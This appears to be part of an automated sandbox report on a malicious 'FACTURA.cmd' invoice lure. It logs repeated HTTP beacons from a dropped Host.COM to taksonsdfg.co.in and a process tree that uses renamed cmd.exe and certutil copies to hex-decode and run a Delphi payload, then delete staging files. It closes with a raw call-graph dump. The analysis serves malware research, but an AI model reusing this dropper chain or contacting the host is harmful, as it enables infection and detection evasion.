                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:31:14 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.4 | 50208 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:31:14 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
2024-10-14 02:31:15 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:14 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:31:15 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:31:15 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.4 | 50210 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:31:15 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
2024-10-14 02:31:16 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:16 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:31:16 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:31:16 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.4 | 50212 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:31:17 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
2024-10-14 02:31:17 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:17 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:31:17 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:31:17 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.4 | 50214 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:31:18 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
2024-10-14 02:31:18 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:18 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:31:18 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:31:18 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.4 | 50216 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:31:19 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
2024-10-14 02:31:19 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:19 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:31:19 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:19 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    107 | 192.168.2.4 | 50218 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:31:20 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:31:20 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:31:20 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:31:20 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:31:20 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Target ID:0
                                                                                    Start time:22:29:13
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FACTURA.cmd" "
                                                                                    Imagebase:0x7ff7985a0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:1
                                                                                    Start time:22:29:13
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:22:29:13
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Windows\System32\extrac32.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                                                                    Imagebase:0x7ff6fc9d0000
                                                                                    File size:35'328 bytes
                                                                                    MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:22:29:13
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Users\Public\alpha.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                    Imagebase:0x7ff793740000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    • Detection: 0%, Virustotal, Browse
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:22:29:13
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Windows\System32\extrac32.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                    Imagebase:0x7ff6fc9d0000
                                                                                    File size:35'328 bytes
                                                                                    MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:22:29:14
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Users\Public\alpha.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3
                                                                                    Imagebase:0x7ff793740000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:6
                                                                                    Start time:22:29:14
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Users\Public\kn.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3
                                                                                    Imagebase:0x7ff7e0790000
                                                                                    File size:1'651'712 bytes
                                                                                    MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    • Detection: 0%, Virustotal, Browse
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:7
                                                                                    Start time:22:29:15
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Users\Public\alpha.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
                                                                                    Imagebase:0x7ff793740000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:8
                                                                                    Start time:22:29:15
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Users\Public\kn.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
                                                                                    Imagebase:0xbe0000
                                                                                    File size:1'651'712 bytes
                                                                                    MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:9
                                                                                    Start time:22:29:16
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Users\Public\Libraries\Host.COM
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\Public\Libraries\Host.COM
                                                                                    Imagebase:0x400000
                                                                                    File size:1'483'264 bytes
                                                                                    MD5 hash:320D5ED383D73182150A145823610493
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:Borland Delphi
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 51%, Virustotal, Browse
                                                                                    Reputation:low
                                                                                    Has exited:false

                                                                                    Target ID:10
                                                                                    Start time:22:29:16
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Users\Public\alpha.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                                                                                    Imagebase:0x7ff793740000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:11
                                                                                    Start time:22:29:16
                                                                                    Start date:13/10/2024
                                                                                    Path:C:\Users\Public\alpha.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S
                                                                                    Imagebase:0x7ff793740000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                      Execution Graph

                                                                                      Execution Coverage:5.5%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:35.1%
                                                                                      Total number of Nodes:781
                                                                                      Total number of Limit Nodes:21
calls 18861->18862 18862->18844 18862->18845 18862->18849 18862->18852 18862->18854 18862->18858 18862->18859 18862->18860 18862->18861 18862->18862 18863 7ff79374af74 170 API calls 18862->18863 18864 7ff793750d71 wcsrchr 18862->18864 18866 7ff793750fb1 wcsrchr 18862->18866 18867 7ff79375291c 8 API calls 18862->18867 18868 7ff793750fd0 wcschr 18862->18868 18869 7ff793752eb4 22 API calls 18862->18869 18872 7ff7937510fd wcsrchr 18862->18872 18881 7ff793751087 _wcsicmp 18862->18881 18884 7ff79375da74 18862->18884 19314 7ff793753bac 18862->19314 19318 7ff793752efc 18862->19318 18863->18862 18864->18862 18865 7ff793750d97 NeedCurrentDirectoryForExePathW 18864->18865 18865->18854 18865->18862 18866->18862 18866->18868 18867->18862 18868->18851 18870 7ff793750fed wcschr 18868->18870 18869->18862 18870->18851 18870->18862 18872->18862 18873 7ff79375111a _wcsicmp 18872->18873 18874 7ff79375123d 18873->18874 18875 7ff793751138 _wcsicmp 18873->18875 18877 7ff793751175 18874->18877 18878 7ff793751250 ??_V@YAXPEAX 18874->18878 18875->18874 18876 7ff7937510c5 18875->18876 18876->18877 18879 7ff793751169 ??_V@YAXPEAX 18876->18879 18880 7ff793758f80 7 API calls 18877->18880 18878->18877 18879->18877 18882 7ff793751189 18880->18882 18883 7ff7937510a7 _wcsicmp 18881->18883 18881->18884 18882->18645 18883->18876 18883->18884 18884->18851 18884->18853 18886 7ff793747211 _setjmp 18885->18886 18890 7ff793747279 18885->18890 18888 7ff793747265 18886->18888 18886->18890 19332 7ff7937472b0 18888->19332 18890->18651 18892 7ff79374cb63 18891->18892 18893 7ff79374cd90 166 API calls 18892->18893 18894 7ff79374c848 18893->18894 18894->18690 18895 7ff79374cad4 18894->18895 18896 7ff79374cad9 18895->18896 18904 7ff79374cb05 18895->18904 18897 7ff79374cd90 166 API calls 18896->18897 18896->18904 18898 7ff79375c722 18897->18898 18899 7ff79375c72e GetConsoleTitleW 18898->18899 18898->18904 18900 7ff79375c74a 18899->18900 18899->18904 18901 7ff79374b6b0 170 API calls 18900->18901 18906 7ff79375c778 
18901->18906 18902 7ff79375c7ec 18903 7ff79374ff70 2 API calls 18902->18903 18903->18904 18904->18690 18905 7ff79375c7dd SetConsoleTitleW 18905->18902 18906->18902 18906->18905 18908 7ff7937542ab UpdateProcThreadAttribute 18907->18908 18909 7ff79375ecd4 GetLastError 18907->18909 18910 7ff7937542eb memset memset GetStartupInfoW 18908->18910 18911 7ff79375ecf0 GetLastError 18908->18911 18912 7ff79375ecee 18909->18912 18914 7ff793753a90 170 API calls 18910->18914 19008 7ff793769eec 18911->19008 18916 7ff7937543a8 18914->18916 18917 7ff79374b900 166 API calls 18916->18917 18918 7ff7937543bb 18917->18918 18919 7ff7937543cc 18918->18919 18920 7ff793754638 _local_unwind 18918->18920 18921 7ff7937543de wcsrchr 18919->18921 18922 7ff793754415 18919->18922 18920->18919 18921->18922 18923 7ff7937543f7 lstrcmpW 18921->18923 18995 7ff793755a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 18922->18995 18923->18922 18926 7ff793754668 18923->18926 18925 7ff79375441a 18927 7ff79375442a CreateProcessW 18925->18927 18930 7ff793754596 CreateProcessAsUserW 18925->18930 18996 7ff793769044 18926->18996 18929 7ff79375448b 18927->18929 18931 7ff793754495 CloseHandle 18929->18931 18932 7ff793754672 GetLastError 18929->18932 18930->18929 18933 7ff79375498c 8 API calls 18931->18933 18940 7ff79375468d 18932->18940 18934 7ff7937544c5 18933->18934 18939 7ff7937544cd 18934->18939 18934->18940 18935 7ff7937547a3 18935->18729 18936 7ff7937544f8 18936->18935 18938 7ff793754612 18936->18938 18942 7ff793755cb4 7 API calls 18936->18942 18937 7ff79374cd90 166 API calls 18941 7ff793754724 18937->18941 18943 7ff79375461c 18938->18943 18945 7ff7937547e1 CloseHandle 18938->18945 18939->18935 18939->18936 18954 7ff79376a250 33 API calls 18939->18954 18940->18937 18940->18939 18944 7ff79375472c _local_unwind 18941->18944 18951 7ff79375473d 18941->18951 18946 7ff793754517 18942->18946 18947 7ff79374ff70 GetProcessHeap RtlFreeHeap 18943->18947 18944->18951 18945->18943 18948 7ff7937533f0 
_vsnwprintf 18946->18948 18949 7ff7937547fa DeleteProcThreadAttributeList 18947->18949 18950 7ff793754544 18948->18950 18952 7ff793758f80 7 API calls 18949->18952 18953 7ff79375498c 8 API calls 18950->18953 18959 7ff79374ff70 GetProcessHeap RtlFreeHeap 18951->18959 18955 7ff793754820 18952->18955 18956 7ff793754558 18953->18956 18954->18936 18955->18729 18957 7ff7937547ae 18956->18957 18958 7ff793754564 18956->18958 18961 7ff7937533f0 _vsnwprintf 18957->18961 18960 7ff79375498c 8 API calls 18958->18960 18962 7ff79375475b _local_unwind 18959->18962 18963 7ff793754577 18960->18963 18961->18938 18962->18939 18963->18943 18964 7ff79375457f 18963->18964 18965 7ff79376a920 210 API calls 18964->18965 18966 7ff793754584 18965->18966 18966->18943 18968 7ff793755c4e 18967->18968 18969 7ff793755c45 18967->18969 18968->18732 18969->18968 18970 7ff79375f470 SetConsoleTitleW 18969->18970 18970->18968 18988 7ff793749737 18971->18988 18973 7ff79374977d memset 18975 7ff79374ca40 17 API calls 18973->18975 18974 7ff79374cd90 166 API calls 18974->18988 18975->18988 18976 7ff79375b7b3 18977 7ff79375b76e 18979 7ff793743278 166 API calls 18977->18979 18978 7ff79375b79a 18981 7ff79375855c ??_V@YAXPEAX 18978->18981 18982 7ff79375b787 18979->18982 18980 7ff79374b364 17 API calls 18980->18988 18981->18976 18983 7ff79375b795 18982->18983 19098 7ff79376e944 18982->19098 19106 7ff793767694 18983->19106 18988->18973 18988->18974 18988->18976 18988->18977 18988->18978 18988->18980 18988->18988 18990 7ff79374986d 18988->18990 19010 7ff793751fac memset 18988->19010 19037 7ff79374ce10 18988->19037 19087 7ff7937496b4 18988->19087 19092 7ff793755920 18988->19092 18991 7ff79374988c 18990->18991 18992 7ff793749880 ??_V@YAXPEAX 18990->18992 18993 7ff793758f80 7 API calls 18991->18993 18992->18991 18994 7ff79374989d 18993->18994 18994->18729 18997 7ff793753a90 170 API calls 18996->18997 18998 7ff793769064 18997->18998 18999 7ff79376906e 18998->18999 19000 7ff793769083 18998->19000 19001 7ff79375498c 8 API 
calls 18999->19001 19002 7ff79374cd90 166 API calls 19000->19002 19003 7ff793769081 19001->19003 19004 7ff79376909b 19002->19004 19003->18922 19004->19003 19005 7ff79375498c 8 API calls 19004->19005 19006 7ff7937690ec 19005->19006 19007 7ff79374ff70 2 API calls 19006->19007 19007->19003 19009 7ff79375ed0a DeleteProcThreadAttributeList 19008->19009 19009->18912 19011 7ff79375203b 19010->19011 19012 7ff7937520b0 19011->19012 19013 7ff793752094 19011->19013 19014 7ff793753060 171 API calls 19012->19014 19016 7ff79375211c 19012->19016 19015 7ff7937520a6 19013->19015 19017 7ff793743278 166 API calls 19013->19017 19014->19016 19019 7ff793758f80 7 API calls 19015->19019 19016->19015 19018 7ff793752e44 2 API calls 19016->19018 19017->19015 19021 7ff793752148 19018->19021 19020 7ff793752325 19019->19020 19020->18988 19021->19015 19022 7ff793752d70 3 API calls 19021->19022 19023 7ff7937521af 19022->19023 19024 7ff79374b900 166 API calls 19023->19024 19026 7ff7937521d0 19024->19026 19025 7ff79375e04a ??_V@YAXPEAX 19025->19015 19026->19025 19027 7ff79375221c wcsspn 19026->19027 19036 7ff7937522a4 ??_V@YAXPEAX 19026->19036 19029 7ff79374b900 166 API calls 19027->19029 19030 7ff79375223b 19029->19030 19030->19025 19033 7ff793752252 19030->19033 19031 7ff79374d3f0 223 API calls 19031->19036 19032 7ff79375e06d wcschr 19032->19033 19033->19032 19034 7ff79375e090 towupper 19033->19034 19035 7ff79375228f 19033->19035 19034->19033 19034->19035 19035->19031 19036->19015 19075 7ff79374d0f8 19037->19075 19083 7ff79374ce5b 19037->19083 19038 7ff793758f80 7 API calls 19041 7ff79374d10a 19038->19041 19039 7ff79375c860 19040 7ff79375c97c 19039->19040 19145 7ff79376ee88 19039->19145 19042 7ff79376e9b4 197 API calls 19040->19042 19041->18988 19045 7ff79375c981 longjmp 19042->19045 19047 7ff79375c99a 19045->19047 19051 7ff79375c9b3 ??_V@YAXPEAX 19047->19051 19047->19075 19048 7ff79375c95c 19048->19040 19054 7ff7937496b4 186 API calls 19048->19054 19049 7ff79375c882 EnterCriticalSection 
LeaveCriticalSection 19053 7ff79374d0e3 19049->19053 19051->19075 19052 7ff79374ceaa _tell 19055 7ff79374d208 _close 19052->19055 19053->18988 19054->19048 19055->19083 19056 7ff79374cd90 166 API calls 19056->19083 19057 7ff79375c9d5 19058 7ff79376d610 167 API calls 19057->19058 19060 7ff79375c9da 19058->19060 19059 7ff79374b900 166 API calls 19059->19083 19061 7ff79375ca07 19060->19061 19063 7ff79376bfec 176 API calls 19060->19063 19062 7ff79376e91c 198 API calls 19061->19062 19067 7ff79375ca0c 19062->19067 19064 7ff79375c9f1 19063->19064 19065 7ff793743240 166 API calls 19064->19065 19065->19061 19066 7ff79374cf33 memset 19066->19083 19067->18988 19068 7ff79374ca40 17 API calls 19068->19083 19069 7ff79374d184 wcschr 19069->19083 19070 7ff79376bfec 176 API calls 19070->19083 19071 7ff79375c9c9 19073 7ff79375855c ??_V@YAXPEAX 19071->19073 19072 7ff79374d1a7 wcschr 19072->19083 19073->19075 19075->19038 19076 7ff793750a6c 273 API calls 19076->19083 19077 7ff79374be00 635 API calls 19077->19083 19078 7ff793753448 166 API calls 19078->19083 19079 7ff79374cfab _wcsicmp 19079->19083 19080 7ff793750580 12 API calls 19081 7ff79374d003 GetConsoleOutputCP GetCPInfo 19080->19081 19082 7ff7937504f4 3 API calls 19081->19082 19082->19083 19083->19039 19083->19047 19083->19053 19083->19056 19083->19057 19083->19059 19083->19066 19083->19068 19083->19069 19083->19070 19083->19071 19083->19072 19083->19075 19083->19076 19083->19077 19083->19078 19083->19079 19083->19080 19085 7ff793751fac 238 API calls 19083->19085 19086 7ff79374d044 ??_V@YAXPEAX 19083->19086 19112 7ff793750494 19083->19112 19125 7ff79374df60 19083->19125 19181 7ff79376778c 19083->19181 19212 7ff79376c738 19083->19212 19085->19083 19086->19083 19088 7ff7937496c8 19087->19088 19089 7ff79375b6e2 RevertToSelf CloseHandle 19087->19089 19090 7ff7937496ce 19088->19090 19091 7ff793746a48 184 API calls 19088->19091 19090->18988 19091->19088 19093 7ff79375596c 19092->19093 19094 7ff793755a12 19092->19094 19093->19094 19095 
